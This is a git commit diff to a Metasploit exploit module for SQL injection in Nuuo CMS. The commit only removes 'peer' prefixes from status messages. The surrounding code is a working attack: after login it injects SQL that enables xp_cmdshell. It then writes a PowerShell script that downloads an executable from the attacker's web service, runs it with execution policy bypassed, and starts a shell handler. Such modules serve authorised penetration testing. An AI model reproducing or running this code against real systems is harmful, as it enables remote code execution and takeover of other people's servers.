Remove peer

Pedro Ribeiro · web-flow · commit da4bd2e9b81a · 2019-01-22T12:10:45.000+07:00
diff --git a/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb b/modules/exploits/windows/nuuo/nuuo_cms_sqli.rb
@@ -65,10 +65,10 @@ def inject_sql(sql, final = false)
   def on_request_uri(cli, request)
     #print_status("on_request_uri called: #{request.inspect}")
     if (not @pl)
-      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
+      print_error("A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_good("#{peer} - Sending the payload to CMS...")
+    print_good("Sending the payload to CMS...")
     @exe_sent = true
     send_response(cli, @pl)
   end
@@ -86,7 +86,7 @@ def exploit
     login
 
     if @session == nil
-      fail_with(Failure::Unknown, "#{peer} - Failed to login to Nuuo CMS")
+      fail_with(Failure::Unknown, "Failed to login to Nuuo CMS")
     end
 
     downfile = rand_text_alpha(8+rand(8))
@@ -107,7 +107,7 @@ def exploit
     end
 
     service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-    print_status("#{peer} - Starting up our web service on #{service_url} ...")
+    print_status("Starting up our web service on #{service_url} ...")
     start_service({'Uri' => {
       'Proc' => Proc.new { |cli, req|
         on_request_uri(cli, req)
@@ -119,11 +119,11 @@ def exploit
 
     # we need to roll our own here instead of using the MSSQL mixins
     # (tried that and it doesn't work)
-    print_status("#{peer} - Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
+    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
     filename = rand_text_alpha_lower(rand(8) + 2) + ".exe"
     download_pl = %{xp_cmdshell 'cd C:\\windows\\temp\\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "#{service_url}" >> wget.ps1 && echo $file = "#{filename}" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1'}
 
-    print_status("#{peer} - Injecting PowerShell payload")
+    print_status("Injecting PowerShell payload")
     inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
 
     counter = 0
@@ -133,10 +133,10 @@ def exploit
     end
 
     if not @exe_sent
-      fail_with(Failure::Unknown, "#{peer} - Could not get CMS to download the payload")
+      fail_with(Failure::Unknown, "Could not get CMS to download the payload")
     end
 
-    print_status("#{peer} - Executing shell...")
+    print_status("Executing shell...")
     inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{filename}\""), true)
     handler
   end
